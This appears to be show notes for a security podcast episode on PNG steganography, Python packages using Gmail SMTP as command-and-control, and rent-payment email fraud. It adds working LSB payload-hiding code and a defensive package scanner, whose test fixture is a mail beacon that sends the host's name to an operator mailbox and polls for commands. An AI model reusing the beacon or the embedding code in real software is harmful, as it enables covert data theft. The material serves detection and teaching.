

SANS Stormcast Friday, May 2nd: More Steganography; Malicious Python Packages GMail C2; BEC to Steal Rent Payments
May 2, 2025
This episode covers three items: how data hidden in images by steganography is extracted, a new trend of malicious Python packages using Gmail as a command-and-control channel (a direct risk to developers who install them), and a business email compromise campaign by a French threat actor targeting property management firms to divert tenant rent payments. Each item closes with practical advice on protection.
AI Snips
Steganography in PNG Images
- PNG uses lossless compression, so the one-bit changes that least-significant-bit (LSB) steganography makes to pixel values survive intact; a lossy format such as JPEG requantizes pixel values and would destroy them.
- Extracting the hidden data means decoding the image, reading the least significant bit of each pixel value back out and reassembling the bits; in the case discussed, the recovered payload was an embedded executable.
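The following is an added example, not code from the episode or from any tool it mentions. It writes a minimal PNG (8-bit RGB, filter type 0, stdlib only), hides a payload in the least significant bit of successive channel bytes with a 4-byte length header, parses the PNG chunks and inflates IDAT, and recovers the payload. The cover image, the payload (an "MZ" prefix standing in for an embedded executable) and the length-header layout are all constructed for the example; real stego tools use their own layouts, so an extractor has to be matched to the embedding scheme.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def _chunk(kind: bytes, body: bytes) -> bytes:
    """Length + type + body + CRC32 over type and body, as the PNG spec requires."""
    crc = zlib.crc32(kind + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + kind + body + struct.pack(">I", crc)


def write_png(width: int, height: int, pixels: bytes) -> bytes:
    """Encode raw 8-bit RGB pixels (row-major, 3 bytes per pixel) as a PNG.
    Every scanline uses filter type 0 (None); IDAT is zlib-compressed (lossless)."""
    assert len(pixels) == width * height * 3
    stride = width * 3
    raw = b"".join(b"\x00" + pixels[r * stride:(r + 1) * stride] for r in range(height))
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)  # 8-bit, colour type 2 = RGB
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b"")


def read_png(data: bytes):
    """Parse a PNG written by write_png back into (width, height, pixels).
    Handles only 8-bit RGB with filter type 0, which is all this example writes."""
    assert data[:8] == PNG_SIG, "not a PNG"
    pos, idat, width, height = 8, b"", 0, 0
    while pos < len(data):
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        kind, body = data[pos + 4:pos + 8], data[pos + 8:pos + 8 + length]
        if kind == b"IHDR":
            width, height, depth, ctype = struct.unpack(">IIBB", body[:10])
            assert (depth, ctype) == (8, 2), "example handles 8-bit RGB only"
        elif kind == b"IDAT":
            idat += body  # IDAT may be split across chunks; concatenate before inflating
        pos += 12 + length  # 4 length + 4 type + body + 4 CRC
    raw = zlib.decompress(idat)
    stride = width * 3
    rows = []
    for r in range(height):
        row = raw[r * (stride + 1):(r + 1) * (stride + 1)]
        assert row[0] == 0, "example handles filter type 0 only"
        rows.append(row[1:])
    return width, height, b"".join(rows)


def embed_lsb(pixels: bytes, payload: bytes) -> bytes:
    """Hide payload in the least significant bit of successive channel bytes,
    prefixed with a 4-byte big-endian length so the extractor knows where to stop."""
    msg = struct.pack(">I", len(payload)) + payload
    bits = [(b >> (7 - i)) & 1 for b in msg for i in range(8)]  # MSB first
    if len(bits) > len(pixels):
        raise ValueError("payload too large for this cover image")
    out = bytearray(pixels)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & 0xFE) | bit  # changes each used byte by at most 1
    return bytes(out)


def extract_lsb(pixels: bytes) -> bytes:
    """Reverse of embed_lsb: read the length header, then that many bytes of LSBs."""
    def bits_to_bytes(start: int, n: int) -> bytes:
        return bytes(sum((pixels[start + i * 8 + j] & 1) << (7 - j) for j in range(8))
                     for i in range(n))
    (n,) = struct.unpack(">I", bits_to_bytes(0, 4))
    if 32 + n * 8 > len(pixels):
        raise ValueError("length header does not fit the image: no payload in this layout")
    return bits_to_bytes(32, n)


def demo():
    """Round trip: cover -> stego PNG -> parse -> extract. Returns values to check."""
    width, height = 64, 48
    # Constructed cover image: a smooth gradient, not a real photo.
    cover = bytes((x * 2 + y * 3 + c * 40) & 0xFF
                  for y in range(height) for x in range(width) for c in range(3))
    # Constructed stand-in for an embedded executable (an "MZ" header plus text), not a real PE.
    payload = b"MZ" + b"\x00" * 6 + b"constructed stand-in for an embedded executable"
    stego_png = write_png(width, height, embed_lsb(cover, payload))
    w, h, pixels = read_png(stego_png)
    return {
        "payload": payload,
        "recovered": extract_lsb(pixels),
        "max_delta": max(abs(a - b) for a, b in zip(cover, pixels)),  # never exceeds 1
        "size": (w, h),
    }


if __name__ == "__main__":
    r = demo()
    print("recovered" if r["recovered"] == r["payload"] else "FAILED", "max delta:", r["max_delta"])
```

The `max_delta` value is the whole point of the lossless-format remark: every channel byte differs from the cover by at most one, which is invisible to the eye but survives PNG's deflate round trip exactly. Re-encoding the stego image as JPEG would change those low bits and the extractor would read garbage (the length header check above would then usually fail).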
Gmail SMTP as C2 Channel
- Malicious Python packages are using Gmail's SMTP service as a stealthy command-and-control channel.
- Because the traffic goes to Google's legitimate mail servers over the same protocols that ordinary mail clients use, it blends in with normal email and is hard to flag from network traffic alone.
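Since the network side looks like ordinary mail, one place a defender can still catch this is the package itself, before it is installed. The following is an added example, not the episode's code and not the malicious packages' code: an `ast`-based scan that flags Python source constructing a stdlib `smtplib`/`imaplib` client with a hard-coded host and calling `login()` with string-literal credentials, since a library has no legitimate reason to ship its own mailbox. The two sample sources, the `is_suspicious` rule and the `scan_wheel` helper are constructed for the example; the Gmail hostnames are Google's documented SMTP/IMAP endpoints.

```python
import ast
import zipfile

# Client constructors from the stdlib smtplib and imaplib modules, and the
# Gmail endpoints this check treats as a mail-C2 indicator when hard-coded.
MAIL_CLIENT_CLASSES = {"SMTP", "SMTP_SSL", "IMAP4", "IMAP4_SSL"}
GMAIL_HOSTS = {"smtp.gmail.com", "imap.gmail.com"}


def _call_name(node: ast.Call):
    f = node.func
    if isinstance(f, ast.Attribute):
        return f.attr
    if isinstance(f, ast.Name):
        return f.id
    return None


def _str_literal(node) -> bool:
    return isinstance(node, ast.Constant) and isinstance(node.value, str)


def scan_source(src: str, filename: str = "<string>"):
    """Return findings for mail-client construction with a hard-coded host and
    login() calls with literal credentials, sorted by line number."""
    findings = []
    for node in ast.walk(ast.parse(src, filename)):
        if not isinstance(node, ast.Call):
            continue
        name = _call_name(node)
        if name in MAIL_CLIENT_CLASSES and node.args and _str_literal(node.args[0]):
            host = node.args[0].value
            findings.append({"file": filename, "line": node.lineno, "kind": "mail_client",
                             "host": host, "gmail": host in GMAIL_HOSTS})
        elif name == "login" and len(node.args) >= 2 and all(map(_str_literal, node.args[:2])):
            findings.append({"file": filename, "line": node.lineno, "kind": "literal_credentials",
                             "user": node.args[0].value})  # password deliberately not recorded
    return sorted(findings, key=lambda f: (f["file"], f["line"]))


def is_suspicious(findings) -> bool:
    """Hard-coded Gmail endpoint plus embedded mailbox credentials: treat the
    combination as a mail-based C2 stub (constructed rule for this example)."""
    return (any(f["kind"] == "mail_client" and f["gmail"] for f in findings)
            and any(f["kind"] == "literal_credentials" for f in findings))


def scan_wheel(path: str):
    """Scan every .py member of a wheel (a zip archive) before installing it."""
    findings = []
    with zipfile.ZipFile(path) as wheel:
        for member in wheel.namelist():
            if member.endswith(".py"):
                try:
                    findings += scan_source(wheel.read(member).decode("utf-8", "replace"), member)
                except SyntaxError:
                    pass  # not valid Python 3 source; out of scope for this check
    return findings


# Constructed sample resembling a mail-based beacon; illustrative only, not the
# code from the packages discussed in the episode.
SUSPICIOUS_SAMPLE = '''
import platform, smtplib, imaplib

def beacon():
    s = smtplib.SMTP_SSL("smtp.gmail.com", 465)
    s.login("collector.mailbox@gmail.com", "app-password")
    s.sendmail("collector.mailbox@gmail.com", "operator@gmail.com", platform.node())
    s.quit()

def poll():
    m = imaplib.IMAP4_SSL("imap.gmail.com")
    m.login("collector.mailbox@gmail.com", "app-password")
    return m.search(None, "UNSEEN")
'''

# Constructed benign sample: same API, but host and credentials come from the
# deployment's configuration rather than being baked into the package.
BENIGN_SAMPLE = '''
import os, smtplib

def notify(body):
    s = smtplib.SMTP(os.environ["SMTP_HOST"], 587)
    s.starttls()
    s.login(os.environ["SMTP_USER"], os.environ["SMTP_PASS"])
    s.sendmail(os.environ["SMTP_USER"], "ops@example.com", body)
'''

if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        f = scan_source(src, label + ".py")
        print(label, is_suspicious(f), [(x["line"], x["kind"]) for x in f])
```

Run `scan_wheel("package.whl")` on a downloaded wheel (for example after `pip download --no-deps`) to review it before `pip install`. The check is deliberately narrow: it will miss credentials that are obfuscated or assembled at runtime, so treat it as a triage aid, and pair it with an egress policy that only allows mail ports (25, 465, 587) from hosts that are actually supposed to send mail.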
Preventing BEC Rent Payment Fraud
- Never change critical payment details (such as the bank account rent is paid into) on the strength of an email alone.
- Establish a business rule that any such change must be confirmed in writing through a separately verified channel or in person before it takes effect; this is what stops BEC fraud.